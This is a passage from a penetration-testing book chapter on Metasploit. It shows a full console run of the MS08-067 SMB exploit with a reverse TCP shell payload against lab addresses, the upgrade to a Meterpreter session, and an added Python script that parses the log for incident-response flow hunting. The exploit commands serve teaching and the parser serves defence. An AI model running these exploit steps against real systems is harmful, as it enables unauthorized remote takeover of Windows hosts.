Chapter 6

into the network. Let’s look at a quick example from start to finish using 
MS08-067 with a reverse command shell as the payload, and upgrade it to a 
Meterpreter shell.

root@bt:/opt/framework3/msf3# msfconsole
msf > search ms08_067
[*] Searching loaded modules for pattern 'ms08_067'...

Exploits
========

   Name                         Rank   Description
   ----                         ----   -----------
   windows/smb/ms08_067_netapi  great  Microsoft Server Service Relative Path Stack Corruption

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > setg LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(ms08_067_netapi) > setg LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > exploit -z
[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1032)
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -u 1
[*] Started reverse handler on 192.168.33.129:8080
[*] Starting the payload handler...
[*] Command Stager progress - 3.16% done (1694/53587 bytes)
[*] Command Stager progress - 6.32% done (3388/53587 bytes)

. . . SNIP . . .

[*] Command Stager progress - 97.99% done (52510/53587 bytes)
[*] Sending stage (748032 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.33.129:8080 -> 192.168.33.130:1044)
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >

At   we issue the setg command for LHOST and LPORT, which is required in order for the sessions -u 1 to upgrade to Meterpreter at  . (The setg command sets the LPORT and LHOST globally in Metasploit, not just for this exploit.)
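For anyone reviewing a saved console log of a session like this one (for a report or during incident response), the following added example, which is not from the book or the Metasploit project, parses the "session N opened" lines shown above, pairs a command shell with the Meterpreter session that replaced it, and lists the network flows to look for in firewall data. The function names and the pairing heuristic are assumptions made for this illustration.

```python
import re
from collections import defaultdict

# Constructed sample: status lines copied from the transcript above, with the
# wrapped Meterpreter line rejoined onto a single line.
TRANSCRIPT = """\
[*] Started reverse handler on 192.168.33.129:8080
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1032)
[*] Session 1 created in the background.
[*] Command Stager progress - 97.99% done (52510/53587 bytes)
[*] Sending stage (748032 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.33.129:8080 -> 192.168.33.130:1044)
"""

SESSION_RE = re.compile(
    r"\[\*\] (?P<kind>Command shell|Meterpreter) session (?P<id>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\)"
)

def parse_sessions(text):
    """Return one dict per 'session N opened' line, in transcript order."""
    sessions = []
    for m in SESSION_RE.finditer(text):  # finditer: a prompt may precede "[*]"
        s = m.groupdict()
        for key in ("id", "lport", "rport"):
            s[key] = int(s[key])
        sessions.append(s)
    return sessions

def find_upgrades(sessions):
    """Heuristic (assumption): a Meterpreter session that reached the same
    listener from the same remote host as an earlier command shell is
    treated as the result of 'sessions -u' on that shell."""
    shells = defaultdict(list)
    upgrades = []
    for s in sessions:
        key = (s["lhost"], s["lport"], s["rhost"])
        if s["kind"] == "Command shell":
            shells[key].append(s["id"])
        elif shells[key]:
            upgrades.append((shells[key].pop(0), s["id"], s["rhost"]))
    return upgrades

def hunt_flows(sessions):
    """With a reverse payload the remote host initiates the connection, so
    the flow to search for in firewall or NetFlow logs is remote -> listener."""
    return [f'{s["rhost"]}:{s["rport"]} -> {s["lhost"]}:{s["lport"]}' for s in sessions]

if __name__ == "__main__":
    found = parse_sessions(TRANSCRIPT)
    print(find_upgrades(found))
    print(hunt_flows(found))
```

Both sessions land on the same listener address and port because LHOST and LPORT were set globally, which is why the pairing key in find_upgrades works for this transcript.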